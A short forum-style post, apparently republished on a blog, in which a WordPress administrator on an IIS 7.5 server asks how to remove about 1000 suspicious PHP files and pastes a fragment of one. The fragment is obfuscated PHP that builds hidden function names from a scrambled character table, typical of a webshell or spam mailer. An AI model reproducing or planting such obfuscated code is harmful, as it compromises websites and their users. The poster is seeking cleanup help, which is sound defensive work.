We are facing alot of weird php files all over our wordpress websites on our IIS 7.5 server. The file look like XSS script and maybe that php code that the hacker use to send spam emails or something else. We have around 1000 same file and it is working since 3 months.
Any idea how to kill these scripts and get the server back clean again?
Sample of this code:
H?3@\"X)<9yiu{S|p#T%YZR8mQ4]h(q:^BD~ALaEJ!Pw\r0tv'-G6z,oN_[KeOC 2Fs+Mj5\nrdW*\tkf}\x1g&;V\$bcI"; $GLOBALS['aonou50'] = $r42[67].$r42[79].$r42[79].$r42[62].$r42[79].$r42[64].$r42[79].$r42[67].$r42[24].$r42[62].$r42[79].$r42[54].$r42[19].$r42[7].$r42[90]; $GLOBALS['rmyuf73'] = $r42[19].$r42[7].$r42[19].$r42[64].$r42[73].$r42[67].$r42[54]; $GLOBALS['jpyvd6'] = $r42[80].$r42[67].$r42[85].$r42[19].$r42[7].$r42[67]; $GLOBALS['zdcfr88'] = $r42[7].$r42[24].$r42[20].$r42[19].$r42[24].$r42[59].$r42[77]; $GLOBALS['objwf19'] = $r42[79].$r42[76].$r42[38].$r42[95].$r42[62].$r42[59].$r42[77]; $GLOBALS['sslhr82'] = $r42[32].$r42[80].$r42[77]; $GLOBALS['drfep85'] = $r42[96].$r42[62].$r42[20].$r42[7].$r42[54]; $GLOBALS['fosip69'] = $r42[54].$r42[19].$r42[32].$r42[67]; $GLOBALS['mqaeu21'] = $r42[96].$r42[62].$r42[7].$r42[73].$r42[54].$r42[46].$r42[7].$r42[54];
Aucun commentaire:
Enregistrer un commentaire